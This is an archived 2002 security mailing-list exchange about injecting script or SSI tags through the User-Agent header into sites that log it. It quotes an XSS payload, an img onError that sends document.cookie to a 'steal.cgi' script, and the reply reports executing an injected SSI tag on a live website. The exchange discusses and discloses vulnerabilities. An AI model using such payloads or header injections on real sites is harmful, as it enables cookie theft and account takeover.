> normally it would contain something like... Mozilla/4.0 (compatible; MSIE > 6.0; Windows NT 5.1; .NET CLR 1.0.3705) > .. > > but with a proxy prog (i use proxomitron) you can change it to whatever you > like.. > > for example: <img src="x.jpg" > onError="this.src='steal.cgi?document.cookie';"> > > and if the site logs it, you just got the administrators password:) > > Now, im yet to come across any sites that this works on because i just > thought of it this afternoon but let me know if it works:) in any case, a > lot of sites would log/store this kind of information so it should be fixed. > A hole in Analog and W3perl suffered from this problem. I'm sure other software does. I have personally found a example of SSI tag inserting using this method on 1 website running "product unknown". I inserted SSI into the User agent field and visit the site which displayed the logs in a ssi page. It executed the ssi tag in which I inserted. I just wrote a paper on cookie theft with xss that may be worth a peek to you. www.cgisecurity.com/articles/xss-faq.shtml Also see http://www.cgisecurity.net/papers/header-based-exploitation.txt - zenoat_private > > > > _________________________________________________________________ > MSN Photos is the easiest way to share and print your photos: > http://photos.msn.com/support/worldwide.aspx > >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 14:18:10 PDT